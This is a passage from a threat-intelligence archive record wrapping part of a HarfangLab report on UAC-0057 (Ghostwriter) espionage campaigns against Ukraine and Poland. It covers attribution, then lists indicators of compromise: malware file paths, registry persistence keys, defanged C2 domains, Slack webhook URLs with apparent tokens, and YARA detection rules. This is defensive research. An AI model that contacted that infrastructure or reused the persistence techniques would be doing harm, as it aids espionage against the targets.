UTC\r\nT08N1F1F64W | Fbfubao | 2025-04-15 15:01:17 UTC\r\nTargets\r\nThe first set of archives described in this report has been uploaded to an online multiscanner service from Ukraine, and contains files whose names and contents are in Ukrainian, including a decoy document pertaining to Ukrainian public services.\r\nOther files referenced in this report (archives and XLS spreadsheets) were uploaded from Poland, and some of them contain file names in Polish. 
In one instance, a decoy document related to the Union of Rural Municipalities of the Republic of Poland has been identified.\r\nDue to our limited visibility, and without any additional information about the context in which these archives or documents have been delivered, we cannot precisely identify the targets of these campaigns, but we believe that organisations or individuals in Ukraine and in Poland were the intended targets.\r\nFigure 9 – Map of targeted countries\r\nAttribution: similarities with reported UAC-0057 activity\r\nOur observations regarding the tools and techniques used by the threat actor, the supporting infrastructure, as well as the targeting of Ukraine and Poland led us to consider an attribution of the reported activities to UAC-0057 (also known as UNC1151, FrostyNeighbor or Ghostwriter), a cyber espionage threat actor with reported ties to the Belarusian government.\r\nIn recent years, the use of weaponized XLS spreadsheets containing obfuscated VBA macros aiming to drop a first stage DLL downloader, as well as implant loading mechanisms similar to what we described, have been documented in several reports associated with UNC1151. In a blog post from February 2025, SentinelOne described the use of XLS spreadsheets containing VBA macros obfuscated with MacroPack and simple C# downloaders in a campaign targeting Ukrainian military and government organisations as well as Belarusian government opposition, which they attribute to Ghostwriter. 
In addition, one of the C++ downloaders we identified seems to be a variant of the same malware described in a blog post pertaining to another infection chain likely associated with FrostyNeighbor.\r\nRegarding the infrastructure, we observed similar setups as previously reported about UNC1151: domains registered at PublicDomainRegistry, the use of Cloudflare nameservers, and C2 URLs mimicking existing legitimate content and serving an image to visiting web clients. Keeping in mind that we only have limited visibility into the threat actor’s operations, it appears that the latter transitioned from the extensive use of top-level domains such as .shop in 2024 to the .icu and .online TLDs in more recent campaigns.\r\nOver the years, multiple publications have highlighted the targeting of Ukraine and Poland by UNC1151. Recently, on June 5, 2025, CERT Polska attributed a campaign targeting instances of Roundcube vulnerable to CVE-2024-42009 to UNC1151. Since 2022, CERT-UA has made several publications about UAC-0057, notably reporting a surge of activity of the threat actor during the summer of 2024.\r\nAs outlined in this section, we observed noticeable similarities with activity attributed by other vendors or governmental organisations to UNC1151, Ghostwriter, FrostyNeighbor or UAC-0057. However, due to our limited visibility into current and past operations of UAC-0057, it would not be reasonable to attribute the described activities with high confidence.\r\nConclusion: minor evolutions to disciplined targeting\r\nOur investigation highlights multiple similarities and overlaps in tooling and infrastructure that are used in the described intrusion campaigns. 
We further determined that the techniques, supporting infrastructure and targeting all align with publicly reported activities that are associated with UAC-0057.\r\nCompared to previously reported facts, and although many techniques remain unchanged, we observed some evolution of UAC-0057’s toolset and practices, including the use of Slack for some C2 communication, as well as a transition to other top-level domains to support their C2 infrastructure. These minor changes suggest that UAC-0057 may be exploring alternatives, in a likely attempt to work around detection, but prioritizes the continuity or development of its operations over stealthiness and sophistication.\r\nAs has been demonstrated by previous reporting over the years, UAC-0057 has consistently been targeting Ukraine and Poland among other neighboring countries, and we expect to observe similar activity directed towards Ukrainian and Polish organisations or individuals in the future, with a possible extension to some other countries in Europe.\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\nFile paths\r\n%TEMP%\\DefenderProtectionScope.log|C# downloader, campaign targeting Ukraine, June 2025\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll|Unknown next stage, campaign targeting Ukraine, June 
2025\r\n%LOCALAPPDATA%\\Serv\\0x00bac729fe.log|C# downloader, campaign targeting Ukraine, July 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C# downloader, campaign targeting Ukraine, J\r\n%APPDATA%\\Local\\Temp\\sdw9gobh0n|Microsoft Cabinet file containing the C# downloader, campaign targeting Ukraine, July 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview past.lnk|LNK file used to extract the C# downloader, campaign targeting Uk\r\n%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log|C# downloader, campaign targeting Ukraine, July 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C# downloader, campaign targeting Ukraine, J\r\n%LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll|C++ downloader, campaign targeting Poland, May 2025\r\n%LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll|Unknown next stage, campaign targeting Poland, May 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C++ dropper, campaign targeting Poland, May\r\n%LOCALAPPDATA\\MSDE\\mrasp86.dll|C++ dropper, campaign targeting Poland, May 2025\r\n%APPDATA%\\DiagnosticComponents\\DiagnosticComponents.dll|C++ loader (Cobalt Strike beacon), campaign targeting Poland, May\r\n%PROGRAMDATA%\\OfficeRuntimeBroker.xlam|Microsoft Cabinet file containing the C# downloader, campaign targeting Poland, Apr\r\n%PROGRAMDATA%\\OfficeRuntimeBroker.lnk|LNK file used to extract and to load the C# downloader, campaign targeting Poland, A\r\n%PROGRAMDATA%\\~OfficeRuntimeBroker.dat|C# downloader, campaign targeting Poland, April 2025\r\nC:\\ProgramData\\ssh\\ssh.pif.pif.pif|Next stage, campaign targeting Poland, April 2025\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.xlam|Microsoft Cabinet file containing the C# downloader, campaign targeting Poland, Apr\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.lnk|LNK file used to extract and to load the C# downloader, 
campaign targeting Poland, A\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.dat|C# downloader, campaign targeting Poland, April 2025\r\nC:\\ProgramData\\WRDSPT\\wrdspt.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.p\r\nPersistence artifacts\r\nRegistry keys\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SytemProtectionService|DefenderProtectionScope.log, downloader persist\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftDefender|Next stage implant (set by DefenderProtectionScope.lo\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SytemProtectService|0x00bac729fe.log, downloader persistence, campaign\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Audio Driver|sdw9gobh0n.log, downloader persistence, campaign targeting\r\nScheduled task names\r\n\\UpdateSDX|SDXHelp.dll, downloader persistence, campaign targeting Poland, May 2025\r\n\\ExpDiagnosticDataSettings|DiagnosticComponents.dll, next stage persistence, campaign targeting Poland, May 2025\r\nDomains\r\nsweetgeorgiayarns[.]online|C2 domain, campaign targeting Ukraine, July 2025\r\nkitchengardenseeds[.]icu|C2 domain, campaign targeting Ukraine, July 2025\r\npunandjokes[.]icu|C2 domain, campaign targeting Ukraine, June 2025\r\ntaskandpurpose[.]icu|C2 domain, campaign targeting Poland, May 2025\r\nmedpagetoday[.]icu|C2 domain, campaign targeting Poland, May 2025\r\npesthacks[.]icu|C2 domain, campaign targeting Poland, April 2025\r\nPossibly related domains\r\ncurseforge[.]icu|Low confidence\r\nURLs\r\nhxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg|C2 URL, campaign targeting Ukr\r\nhxxps://kitchengardenseeds[.]icu/seed-index/flowers/habitat-gardens.jpg|C2 URL, campaign targeting Ukraine, July 2025\r\nhxxps://punandjokes[.]icu/cannabis-jokes.jpg|C2 URL, campaign targeting Ukraine, June 2025\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg|C2 URL, campaign 
targeting Poland, May 2025\r\nhxxps://medpagetoday[.]icu/nicheediting/trends|C2 URL, campaign targeting Poland, May 2025\r\nhxxps://hooks.slack[.]com/services/T08NWSF1L78/B08P91RQ1EW/ZQzZ7IvlT81VpQijneCR0iYa|C2 URL (Slack webhook), campaign targe\r\nhxxps://files.slack[.]com/files-pri/T08NWSF1L78-F08NQETU5M5/owjomlhoms.jpg|C2 URL (Slack), campaign targeting Poland, Apri\r\nhxxps://hooks.slack[.]com/services/T08N1F1F64W/B08N1FMAN94/2QGu5K7wE3k6cVQ448Qa9n4W|C2 URL (Slack webhook), campaign targe\r\nhxxps://files.slack[.]com/files-pri/T08N1F1F64W-F08P2HJNU2F/ocnijrarcjvzenxyqhztf.jpg|C2 URL (Slack), campaign targeting P\r\nYARA rules\r\nrule trr250801_csharp_downloader_combined {\r\n    meta:\r\n        description = \"Detects C# downloaders as likely leveraged by UNC1151, and observed between May and July 2025\"\r\n        references = \"TRR250801\"\r\n        hash = \"559ee2fad8d16ecaa7be398022aa7aa1adbd8f8f882a34d934be9f90f6dcb90b\"\r\n        hash = \"a2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e\"\r\n        date = \"2025-08-08\"\r\n        author = \"HarfangLab\"\r\n        context = \"file\"\r\n    strings:\r\n        $dotNet = \".NETFramework,Version=\" ascii\r\n        $a1 = \"set_SecurityProtocol\" ascii fullword\r\n        $a2 = \"SecurityProtocolType\" ascii fullword\r\n        $a3 = \"ManagementObjectSearcher\" ascii fullword\r\n        $a4 = \"WebClient\" ascii fullword\r\n        $a5 = \"DownloadString\" ascii fullword\r\n        $a6 = \"get_Headers\" ascii fullword\r\n        $a7 = \"StringBuilder\" ascii fullword\r\n        $a8 = \"kernel32.dll\" ascii fullword\r\n        $a9 = \"VirtualProtect\" ascii fullword\r\n        $a10 = \"GetHINSTANCE\" ascii fullword\r\n        $a11 = \"get_FullyQualifiedName\" ascii fullword\r\n        $a12 = \"Marshal\" ascii fullword\r\n        $a13 = \"get_OSVersion\" ascii fullword\r\n        $a14 = \"get_MachineName\" ascii fullword\r\n        $a15 = \"CreateDirectory\" ascii fullword\r\n        $a16 = \"ToBase64String\" ascii fullword\r\n        $a17 = { 00 20C03F0000 28 } // nop, ldc.i4 
0x00003FC0, call (TLS config)\r\n    condition:\r\n        filesize \u003c 100KB and filesize \u003e 10KB\r\n        and (uint16be(0) == 0x4D5A)\r\n        and $dotNet\r\n        and (all of ($a*))\r\n}\r\nrule trr250801_cpp_downloader {\r\n    meta:\r\n        description = \"Detects C++ downloaders as likely leveraged by UNC1151, and observed during May 2025\"\r\n        references = \"TRR250801\"\r\n        hash = \"5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36\"\r\n        date = \"2025-08-08\"\r\n        author = \"HarfangLab\"\r\n        context = \"file\"\r\n    strings:\r\n        $u = { 00 60 be 00 ?? ?? 00 8d be 00 ?? ?? ff 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b\r\n        $s0 = \"RTW0\" fullword\r\n        $s1 = \"RTW1\" fullword\r\n        $s2 = \"RTW2\" fullword\r\n        $e = \"Start\" fullword\r\n    condition:\r\n        uint16be(0) == 0x4D5A and\r\n        filesize \u003c 1MB and\r\n        $u and\r\n        2 of ($s*) and\r\n        $e\r\n}\r\nSource: https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/"
	],
	"report_names": [
		"uac-0057-pressure-ukraine-poland"
	],
	"threat_actors": [
		{
			"id": "f29188d8-2750-4099-9199-09a516c58314",
			"created_at": "2025-08-07T02:03:25.068489Z",
			"updated_at": "2026-04-10T02:00:03.827361Z",
			"deleted_at": null,
			"main_name": "MOONSCAPE",
			"aliases": [
				"TA445 ",
				"UAC-0051 ",
				"UNC1151 "
			],
			"source_name": "Secureworks:MOONSCAPE",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "119c8bea-816e-4799-942b-ff375026671e",
			"created_at": "2022-10-25T16:07:23.957309Z",
			"updated_at": "2026-04-10T02:00:04.807212Z",
			"deleted_at": null,
			"main_name": "Operation Ghostwriter",
			"aliases": [
				"DEV-0257",
				"Operation Asylum Ambuscade",
				"PUSHCHA",
				"Storm-0257",
				"TA445",
				"UAC-0051",
				"UAC-0057",
				"UNC1151",
				"White Lynx"
			],
			"source_name": "ETDA:Operation Ghostwriter",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"HALFSHELL",
				"Impacket",
				"RADIOSTAR",
				"VIDEOKILLER",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73",
			"created_at": "2023-01-06T13:46:39.195689Z",
			"updated_at": "2026-04-10T02:00:03.243054Z",
			"deleted_at": null,
			"main_name": "Ghostwriter",
			"aliases": [
				"UAC-0057",
				"UNC1151",
				"TA445",
				"PUSHCHA",
				"Storm-0257",
				"DEV-0257"
			],
			"source_name": "MISPGALAXY:Ghostwriter",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9e069b33-a19b-4b12-858c-244e5cf404ee",
			"created_at": "2024-11-13T13:15:31.111132Z",
			"updated_at": "2026-04-10T02:00:03.757257Z",
			"deleted_at": null,
			"main_name": "FrostyNeighbor",
			"aliases": [],
			"source_name": "MISPGALAXY:FrostyNeighbor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434396,
	"ts_updated_at": 1775792110,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.pdf",
		"text": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.txt",
		"img": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.jpg"
	}
}